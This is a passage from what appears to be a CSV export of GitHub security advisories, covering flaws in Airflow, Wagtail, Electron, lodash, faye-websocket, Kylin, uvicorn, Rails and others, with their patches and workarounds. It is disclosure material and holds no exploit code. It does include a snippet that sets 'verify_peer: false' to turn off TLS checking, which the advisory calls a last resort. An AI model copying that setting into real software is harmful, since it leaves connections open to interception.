+Parse Server: 3.9.0",[],"[{'package': {'ecosystem': 'npm', 'name': 'parse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.10.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/parse-community/Parse-SDK-JS/security/advisories/GHSA-wvh7-5p38-2qfc'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/Parse-SDK-JS/commit/d1106174571b699f972929dd7cbb8e45b5283cbb'}, {'type': 'PACKAGE', 'url': 'https://github.com/parse-community/Parse-SDK-JS'}]","{'cwe_ids': ['CWE-256'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-23T18:18:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j38c-25fj-mr84,2021-09-22T21:23:36Z,2020-07-27T16:57:34Z,,['CVE-2020-9485'],Stored XSS in Apache Airflow,"An issue was found in Apache Airflow versions 1.10.10 and below. A stored XSS vulnerability was discovered in the Chart pages of the the ""classic"" UI.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9485'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T16:57:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2473-9hgq-j7xw,2021-01-07T23:47:06Z,2020-07-20T17:50:30Z,,['CVE-2020-15118'],Cross-Site Scripting in Wagtail,"### Impact
+When a form page type is made available to Wagtail editors through the `wagtail.contrib.forms` app, and the page template is built using Django's standard form rendering helpers such as `form.as_p` ([as directed in the documentation](https://docs.wagtail.io/en/stable/reference/contrib/forms/index.html#usage)), any HTML tags used within a form field's help text will be rendered unescaped in the page. Allowing HTML within help text is [an intentional design decision](https://docs.djangoproject.com/en/3.0/ref/models/fields/#django.db.models.Field.help_text) by Django; however, as a matter of policy Wagtail does not allow editors to insert arbitrary HTML by default, as this could potentially be used to carry out cross-site scripting attacks, including privilege escalation. This functionality should therefore not have been made available to editor-level users.
+
+The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin.
+
+### Patches
+Patched versions have been released as Wagtail 2.7.4 (for the LTS 2.7 branch) and Wagtail 2.9.3 (for the current 2.9 branch). In these versions, help text will be escaped to prevent the inclusion of HTML tags. Site owners who wish to re-enable the use of HTML within help text (and are willing to accept the risk of this being exploited by editors) may set `WAGTAILFORMS_HELP_TEXT_ALLOW_HTML = True` in their configuration settings.
+
+### Workarounds
+Site owners who are unable to upgrade to the new versions can secure their form page templates by [rendering forms field-by-field as per Django's documentation](https://docs.djangoproject.com/en/3.0/topics/forms/#looping-over-the-form-s-fields), but omitting the `|safe` filter when outputting the help text.
+
+### Acknowledgements
+Many thanks to Timothy Bautista for reporting this issue.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Visit Wagtail's [support channels](https://docs.wagtail.io/en/stable/support.html)
+* Email us at [security@wagtail.io](mailto:security@wagtail.io) (if you wish to send encrypted email, the public key ID is `0x6ba1e1a86e0f8ce8`)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'wagtail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.9.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'wagtail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/security/advisories/GHSA-2473-9hgq-j7xw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15118'}, {'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/commit/d9a41e7f24d08c024acc9a3094940199df94db34'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.0/ref/models/fields/#django.db.models.Field.help_text'}, {'type': 'WEB', 'url': 'https://docs.wagtail.io/en/stable/reference/contrib/forms/index.html#usage'}, {'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/blob/master/docs/releases/2.9.3.rst'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-20T17:47:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wwgf-3xp7-cxj4,2021-09-22T20:22:02Z,2020-07-07T16:33:45Z,,[],Potentially sensitive data exposure in Symfony Web Socket Bundle,"### Impact
+Inside `Gos\Bundle\WebSocketBundle\Server\App\Dispatcher\TopicDispatcher::onPublish()`, messages are arbitrarily broadcasted to the related Topic if `Gos\Bundle\WebSocketBundle\Server\App\Dispatcher\TopicDispatcher::dispatch()` does not succeed. The `dispatch()` method can be considered to not succeed if (depending on the version of the bundle) the callback defined on a topic route is misconfigured, a `Gos\Bundle\WebSocketBundle\Topic\TopicInterface` implementation is not found for the callback, a topic which also implements `Gos\Bundle\WebSocketBundle\Topic\SecuredTopicInterface` rejects the connection, or an Exception is unhandled. This can result in an unintended broadcast to the websocket server potentially with data that should be considered sensitive.
+
+### Patches
+In 1.10.4, 2.6.1, and 3.3.0, `Gos\Bundle\WebSocketBundle\Server\App\Dispatcher\TopicDispatcher::onPublish()` has been changed to no longer broadcast an event's data if `Gos\Bundle\WebSocketBundle\Server\App\Dispatcher\TopicDispatcher::dispatch()` fails.
+
+### Workarounds
+Upgrade to 1.10.4, 2.6.1, and 3.3.0
+
+Note, the 1.x branch is considered end of support as of July 1, 2020.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [this repository](https://github.com/GeniusesOfSymfony/WebSocketBundle)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'gos/web-socket-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'gos/web-socket-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'gos/web-socket-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/GeniusesOfSymfony/WebSocketBundle/security/advisories/GHSA-wwgf-3xp7-cxj4'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/commit/942fd37245cb724ba8cc8d6f11f075a1bd53b338'}, {'type': 'PACKAGE', 'url': 'https://github.com/GeniusesOfSymfony/WebSocketBundle'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PHP-GOSWEBSOCKETBUNDLE-575401'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-07-07T16:21:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6jmr-jfh7-xg3h,2021-01-08T21:00:17Z,2020-07-30T14:58:53Z,,['CVE-2020-15131'],False-positive validity for NFT1 genesis transactions,"### Impact
+In the npm package named ""slp-validate"", versions prior to 1.2.2 are vulnerable to false-positive validation outcomes for the NFT1 Child Genesis transaction type. A poorly implemented SLP wallet or opportunistic attacker could create a seemingly valid NFT1 child token without burning any of the NFT1 Group token type as is required by the NFT1 specification.
+
+### Patches
+npm package ""slp-validate"" has been patched and is published and tagged as version 1.2.2.
+
+### Workarounds
+Upgrade to slp-validate 1.2.2.
+
+### References
+* Package location: https://www.npmjs.com/package/slp-validate
+* SLP NFT1 spec: https://slp.dev/specs/slp-nft-1/#nft1-protocol-requirements
+* Git commit hash fixing this issue: https://github.com/simpleledger/slp-validate.js/commit/3963cf914afae69084059b82483da916d97af65c
+* Unit tests have been added to assist validator implementations in avoiding this bug: https://github.com/simpleledger/slp-unit-test-data/commit/8c942eacfae12686dcf1f3366321445a4fba73e7
+
+### For more information
+If you have any questions or comments about this advisory please open an issue in the [slp-validate](https://github.com/simpleledger/slp-validate.js/issues) repository.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'slp-validate'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/simpleledger/slp-validate.js/security/advisories/GHSA-6jmr-jfh7-xg3h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15131'}, {'type': 'WEB', 'url': 'https://github.com/simpleledger/slp-validate.js/commit/3963cf914afae69084059b82483da916d97af65c'}]","{'cwe_ids': ['CWE-697'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-07-30T14:54:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9g2w-5f3v-mfmm,2021-09-22T21:19:02Z,2020-07-27T16:57:33Z,,['CVE-2020-11982'],Insecure default config of Celery worker in Apache Airflow,"An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attack can connect to the broker (Redis, RabbitMQ) directly, it was possible to insert a malicious payload directly to the broker which could lead to a deserialization attack (and thus remote code execution) on the Worker.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11982'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T16:55:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6vrv-94jv-crrg,2021-01-07T23:48:19Z,2020-07-07T00:01:05Z,,['CVE-2020-15096'],Context isolation bypass via Promise in Electron,"### Impact
+Apps using `contextIsolation` are affected.
+
+This is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions.
+
+### Workarounds
+There are no app-side workarounds, you must update your Electron version to be protected.
+
+### Fixed Versions
+* `9.0.0-beta.21`
+* `8.2.4`
+* `7.2.4`
+* `6.1.11`
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [security@electronjs.org](mailto:security@electronjs.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.11'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.2.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.2.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/electron/electron/security/advisories/GHSA-6vrv-94jv-crrg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15096'}, {'type': 'WEB', 'url': 'https://www.electronjs.org/releases/stable?page=3#release-notes-for-v824'}]","{'cwe_ids': ['CWE-501'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-07-06T23:55:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p6mc-m468-83gw,2022-02-08T22:04:28Z,2020-07-15T19:15:48Z,,['CVE-2020-8203'],Prototype Pollution in lodash,"Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The function zipObjectDeep allows a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires zipping objects based on user-provided property arrays.
+
+This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'lodash'}, 'ecosystem_specific': {'affected_functions': ['lodash.baseSet']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.17.20'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'lodash-es'}, 'ecosystem_specific': {'affected_functions': ['lodash.baseSet']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.17.20'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8203'}, {'type': 'WEB', 'url': 'https://github.com/lodash/lodash/issues/4744'}, {'type': 'WEB', 'url': 'https://github.com/lodash/lodash/issues/4874'}, {'type': 'WEB', 'url': 'https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/712065'}, {'type': 'PACKAGE', 'url': 'https://github.com/lodash/lodash'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200724-0006/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1523'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-1321', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-15T19:14:58Z', 'nvd_published_at': '2020-07-15T17:15:00Z'}"
+1.4.0,GHSA-2v5c-755p-p4gv,2023-05-16T16:01:20Z,2020-07-31T17:40:04Z,,['CVE-2020-15133'],Missing TLS certificate verification in faye-websocket,"The `Faye::WebSocket::Client` class uses the [`EM::Connection#start_tls`][1] method in [EventMachine][2] to implement the TLS handshake whenever a `wss:` URL is used for the connection. This method does not implement certificate verification by default, meaning that it does not check that the server presents a valid and trusted TLS certificate for the expected hostname. That means that any `wss:` connection made using this library is vulnerable to a man-in-the-middle attack, since it does not confirm the identity of the server it is connected to.
+
+This has been a requested feature in EventMachine for many years now; see for example [#275][3], [#378][4], and [#814][5]. In June 2020, [em-http-request][6] published an [advisory][7] related to this problem and fixed it by [implementing TLS verification][8] in their own codebase; although EventMachine does not implement certificate verification itself, it provides an extension point for the caller to implement it, called [`ssl_verify_peer`][9]. Based on this implementation, we have incorporated similar functionality into [faye-websocket for Ruby][10], such that we use the `OpenSSL` module to perform two checks:
+
+- The chain of certificates presented by the server is valid and ultimately trusted by your root certificate set -- either your system default root certificates, or a set provided at runtime
+- The final certificate presented by the server is valid for the hostname used in the request URI; if the connection is made via a proxy we use the hostname from the request, not the proxy's hostname
+
+After implementing verification in v1.1.6, em-http-request has elected to leave the `:verify_peer` option switched off by default. We have decided to _enable_ this option by default in faye-websocket, but are publishing a minor release with added functionality for configuring it. We are mindful of the fact that this may break existing programs, but we consider it much more important that
+all clients have TLS verification turned on by default. A client that is not carrying out verification is either:
+
+- talking to the expected server, and will not break under this change
+- being attacked, and would benefit from being alerted to this fact
+- deliberately talking to a server that would be rejected by verification
+
+The latter case includes situations like talking to a non-public server using a self-signed certificate. We consider this use case to be ""working by accident"", rather than functionality that was actively supported, and it should be properly and explicitly supported instead. To that end, we have added two new options to the `Faye::WebSocket::Client` constructor: `tls.root_cert_file`, and `tls.verify_peer`.
+
+The `:root_cert_file` option lets you provide a different set of root certificates in situations where you don't want to use your system's default root certificates to verify the remote host. It should be a path or an array of paths identifying the certificates to use instead of the defaults.
+
+```rb
+client = Faye::WebSocket::Client.new('wss://example.com/', [], tls: {
+ root_cert_file: 'path/to/certificate.pem'
+})
+```
+
+The `:verify_peer` option lets you turn verification off entirely. This should be a last resort and we recommend using the `:root_cert_file` option if possible.
+
+```rb
+client = Faye::WebSocket::Client.new('wss://example.com/', [], tls: {
+ verify_peer: false
+})
+```
+
+To get the new behaviour, please upgrade to v0.11.0 of the [Rubygems package][10]. There are, unfortunately, no workarounds for this issue, as you cannot enable `:verify_peer` in EventMachine unless the calling library contains an implementation of `ssl_verify_peer` that actually checks the server's certificates.
+
+For further background information on this issue, please see [faye#524][12] and [faye-websocket#129][13]. We would like to thank [Tero Marttila][14] and [Daniel Morsing][15] for providing invaluable assistance and feedback on this issue.
+
+[1]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:start_tls
+[2]: https://rubygems.org/gems/eventmachine
+[3]: https://github.com/eventmachine/eventmachine/issues/275
+[4]: https://github.com/eventmachine/eventmachine/pull/378
+[5]: https://github.com/eventmachine/eventmachine/issues/814
+[6]: https://rubygems.org/gems/em-http-request
+[7]: https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request
+[8]: https://github.com/igrigorik/em-http-request/pull/340
+[9]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:ssl_verify_peer
+[10]: https://rubygems.org/gems/faye-websocket
+[12]: https://github.com/faye/faye/issues/524
+[13]: https://github.com/faye/faye-websocket-ruby/pull/129
+[14]: https://github.com/SpComb
+[15]: https://github.com/DanielMorsing","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'faye-websocket'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.11.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/faye/faye-websocket-ruby/security/advisories/GHSA-2v5c-755p-p4gv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15133'}, {'type': 'WEB', 'url': 'https://github.com/eventmachine/eventmachine/issues/275'}, {'type': 'WEB', 'url': 'https://github.com/eventmachine/eventmachine/issues/814'}, {'type': 'WEB', 'url': 'https://github.com/faye/faye/issues/524'}, {'type': 'WEB', 'url': 'https://github.com/eventmachine/eventmachine/pull/378'}, {'type': 'WEB', 'url': 'https://github.com/faye/faye-websocket-ruby/pull/129'}, {'type': 'WEB', 'url': 'https://github.com/igrigorik/em-http-request/pull/340'}, {'type': 'WEB', 'url': 'https://blog.jcoglan.com/2020/07/31/missing-tls-verification-in-faye/'}, {'type': 'PACKAGE', 'url': 'https://github.com/faye/faye-websocket-ruby'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/faye-websocket/CVE-2020-15133.yml'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request'}, {'type': 'WEB', 'url': 'https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:ssl_verify_peer'}, {'type': 'WEB', 'url': 'https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:start_tls'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-31T17:39:00Z', 'nvd_published_at': '2020-07-31T18:15:00Z'}"
+1.4.0,GHSA-hx5g-8hq2-8x4w,2021-09-22T21:51:23Z,2020-07-27T22:51:40Z,,['CVE-2020-13926'],SQL Injection in Kylin,"Kylin concatenates and executes a Hive SQL in Hive CLI or beeline when building a new segment; some part of the HQL is from system configurations, while the configuration can be overwritten by certain rest api, which makes SQL injection attack is possible. Users of all previous versions after 2.0 should upgrade to 3.1.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.kylin:kylin-server-base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13926'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r021baf9d8d4ae41e8c8332c167c4fa96c91b5086563d9be55d2d7acf@%3Ccommits.kylin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r63d5663169e866d44ff9250796193337cff7d9cf61cc3839e86163fd%40%3Cuser.kylin.apache.org%3E'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEKYLIN-584374'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-07-27T22:50:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-33c7-2mpw-hg34,2021-07-29T21:17:18Z,2020-07-29T18:07:16Z,,['CVE-2020-7694'],Log injection in uvicorn,"This affects all versions of package uvicorn. The request logger provided by the package is vulnerable to ASNI escape sequence injection. Whenever any HTTP request is received, the default behaviour of uvicorn is to log its details to either the console or a log file. When attackers request crafted URLs with percent-encoded escape sequences, the logging component will log the URL after it's been processed with urllib.parse.unquote, therefore converting any percent-encoded characters into their single-character equivalent, which can have special meaning in terminal emulators. By requesting URLs with crafted paths, attackers can: * Pollute uvicorn's access logs, therefore jeopardising the integrity of such files. * Use ANSI sequence codes to attempt to interact with the terminal emulator that's displaying the logs (either in real time or from a file).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'uvicorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.11.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7694'}, {'type': 'WEB', 'url': 'https://github.com/encode/uvicorn'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-UVICORN-575560'}]","{'cwe_ids': ['CWE-116', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-29T17:37:27Z', 'nvd_published_at': '2020-07-27T12:15:00Z'}"
+1.4.0,GHSA-cr3x-7m39-c6jq,2023-07-05T20:22:39Z,2020-07-07T16:34:27Z,,['CVE-2020-8163'],Remote code execution via user-provided local names in ActionView,The is a code injection vulnerability in versions of Rails prior to 5.0.1 that would allow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionview'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.11.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.2.11.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8163'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/304805'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionview/CVE-2020-8163.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/rubyonrails-security/hWuKcHyoKh0'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/158604/Ruby-On-Rails-5.0.1-Remote-Code-Execution.html'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-07-07T15:44:56Z', 'nvd_published_at': '2020-07-02T19:15:00Z'}"
+1.4.0,GHSA-v2wc-pfq2-5cm6,2021-01-08T20:22:25Z,2020-04-14T23:09:29Z,,['CVE-2020-11001'],Possible XSS attack in Wagtail,"### Impact
+A cross-site scripting (XSS) vulnerability exists on the page revision comparison view within the Wagtail admin interface. A user with a limited-permission editor account for the Wagtail admin could potentially craft a page revision history that, when viewed by a user with higher privileges, could perform actions with that user's credentials. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin.
+
+### Patches
+Patched versions have been released as Wagtail 2.7.2 (for the LTS 2.7 branch) and Wagtail 2.8.1 (for the current 2.8 branch).
+
+### Workarounds
+Site owners who are unable to upgrade to the new versions can disable the revision comparison view by adding the following URL route to the top of their project's `urls.py` configuration:
+
+ from django.views.generic.base import RedirectView
+
+ urlpatterns = [
+ url(r'^admin/pages/(\d+)/revisions/compare/', RedirectView.as_view(url='/admin/')),
+ # ...
+ ]
+
+### Acknowledgements
+Many thanks to Vlad Gerasimenko for reporting this issue.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Visit Wagtail's [support channels](https://docs.wagtail.io/en/stable/support.html)
+* Email us at [security@wagtail.io](mailto:security@wagtail.io) (if you wish to send encrypted email, the public key ID is `0x6ba1e1a86e0f8ce8`)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'wagtail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'fixed': '2.7.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'wagtail'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.1'}]}], 'versions': ['2.8.0']}]","[{'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/security/advisories/GHSA-v2wc-pfq2-5cm6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11001'}, {'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/commit/61045ceefea114c40ac4b680af58990dbe732389'}, {'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/releases/tag/v2.8.1'}]","{'cwe_ids': ['CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-04-14T23:02:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q8xg-8xwf-m598,2021-09-16T20:39:54Z,2020-04-16T03:14:59Z,,['CVE-2020-10800'],Machine-In-The-Middle in lix,"All versions of `lix` are vulnerable to Machine-In-The-Middle. The package accepts downloads with `http` and follows `location` header redirects for package downloads. This allows for an attacker in a privileged network position to intercept a lix package installation and redirect the download to a malicious source.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'lix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '15.11.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10800'}, {'type': 'PACKAGE', 'url': 'https://github.com/lix-pm/lix.client'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1306'}]","{'cwe_ids': ['CWE-544', 'CWE-639'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-16T03:10:39Z', 'nvd_published_at': '2020-03-21T15:15:00Z'}"
+1.4.0,GHSA-prfq-f66g-43mp,2021-01-08T20:23:16Z,2020-04-10T18:19:10Z,,['CVE-2020-5263'],Information disclosure through error object in auth0.js,"## Overview
+Between versions 8.0.0 and 9.13.1(inclusive), in the case of an (authentication) error, the error object returned by the library contains the original request of the user, which may include the plaintext password the user entered.
+
+If the error object is exposed or logged without modification, the application risks password exposure.
+
+## Am I affected?
+You are affected by this vulnerability if all of the following conditions apply:
+
+- You are using Auth0.js version between 8.0.0 and 9.13.1(inclusive).
+- You store or display error objects without filtering.
+
+## How to fix that?
+Developers should upgrade auth0.js to version 9.13.2 or later where user inputted passwords are masked in errors. If upgrading is not possible, a temporary fix may include not storing the error object or displaying it publicly without modification.
+
+## Will this update impact my users?
+
